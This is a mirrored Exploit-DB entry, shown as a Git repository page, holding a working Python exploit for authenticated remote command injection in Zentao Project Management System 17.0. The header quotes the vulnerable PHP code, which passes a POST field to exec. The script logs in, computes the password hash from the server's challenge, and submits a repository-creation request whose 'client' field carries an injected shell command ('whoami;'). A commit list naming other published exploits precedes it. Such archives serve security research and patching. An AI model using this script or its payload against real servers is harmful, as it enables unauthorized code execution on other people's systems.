bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51069.txt
Exploit-DB b137003172 DB: 2023-03-28 
36 changes to exploits/shellcodes/ghdb

MiniDVBLinux 5.4  - Change Root Password
MiniDVBLinux 5.4  - Remote Root Command Injection
MiniDVBLinux 5.4 - Arbitrary File Read
MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
MiniDVBLinux <=5.4  - Config Download Exploit

Desktop Central 9.1.0 - Multiple Vulnerabilities

FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass
Aero CMS v0.0.1 - PHP Code Injection (auth)
Aero CMS v0.0.1 - SQL Injection (no auth)

Atom CMS v2.0 - SQL Injection (no auth)
Canteen-Management v1.0 - SQL Injection
Canteen-Management v1.0 - XSS-Reflected

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)

FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)

Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
WebTareas 2.4 - RCE (Authorized)
WebTareas 2.4 - Reflected XSS (Unauthorised)
WebTareas 2.4 - SQL Injection (Unauthorised)

WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities

Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass

Grafana <=6.2.4 - HTML Injection

Hex Workshop v6.7 - Buffer overflow DoS

Scdbg 1.0 - Buffer overflow DoS

Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

AVS Audio Converter 10.3 - Stack Overflow (SEH)

Explorer32++ v1.3.5.531 - Buffer overflow

Frhed (Free hex editor) v1.6.0 - Buffer overflow

Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path

Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path

Resource Hacker v3.6.0.92 - Buffer overflow

Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path

WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
2023-03-28 00:16:27 +00:00

110 lines
No EOL
4 KiB
Text
Raw Permalink Blame History

# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)
# Exploit Author: mister0xf
# Date: 2022-10-8
# Software Link: https://github.com/easysoft/zentaopms
# Version: tested on 17.0 (probably works also on newer/older versions)
# Tested On: Kali Linux 2022.2
# Exploit Tested Using: Python 3.10.4
# Vulnerability Description:
# Zentao Project Management System 17.0 suffers from an authenticated command injection allowing
# remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver
# Vulnerable Source Code:
# /module/repo/model.php:
# [...]
# $client = $this->post->client; // <-- client is taken from the POST request
# [...]
# elseif($scm == 'Git')
# {
# if(!is_dir($path))
# {
# dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path);
# return false;
# }
#
# if(!chdir($path))
# {
# if(!is_executable($path))
# {
# dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path);
# return false;
# }
# dao::$errors['path'] = $this->lang->repo->error->path;
# return false;
# }
#
# $command = "$client tag 2>&1"; // <-- command is injected here
# exec($command, $output, $result);
import requests,sys
import hashlib
from urllib.parse import urlparse
from bs4 import BeautifulSoup
def banner():
print('''
::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: ::::::::
:+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+
+#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
######### ########## ### #### ######## ########### ### ### ########
''')
def usage():
print('Usage: zenciao user password http://127.0.0.1/path')
def main():
if ((len(sys.argv)-1) != 3):
usage()
banner()
exit()
#proxy = {'http':'http://127.0.0.1:8080'}
banner()
username = sys.argv[1]
password = sys.argv[2]
target = sys.argv[3]
# initialize session object
session = requests.session()
home_url = target+'/index.php'
rand_url = target+'/index.php?m=user&f=refreshRandom&t=html'
login_url = target+'/index.php?m=user&f=login&t=html'
create_repo_url = target+'/index.php?m=repo&f=create&objectID=0'
r1 = session.get(home_url)
soup = BeautifulSoup(r1.text, "html.parser")
script_tag = soup.find('script')
redirect_url = script_tag.string.split("'")[1]
r2 = session.get(target+redirect_url)
# get random value
session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
res = session.get(rand_url)
rand = res.text
# compute md5(md5(password)+rand)
md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode())
# login request
post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""}
my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html'
session.headers.update({'Referer': my_referer})
session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
response = session.post(login_url, data=post_data)
# exploit rce
# devops repo page
r2 = session.get(create_repo_url)
git_test_dir = '/home/'
command = 'whoami;'
exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""}
r3 = session.post(create_repo_url, data=exploit_post_data)
print(r3.content)
if __name__ == '__main__':
main()
Reference in a new issue View git blame Copy permalink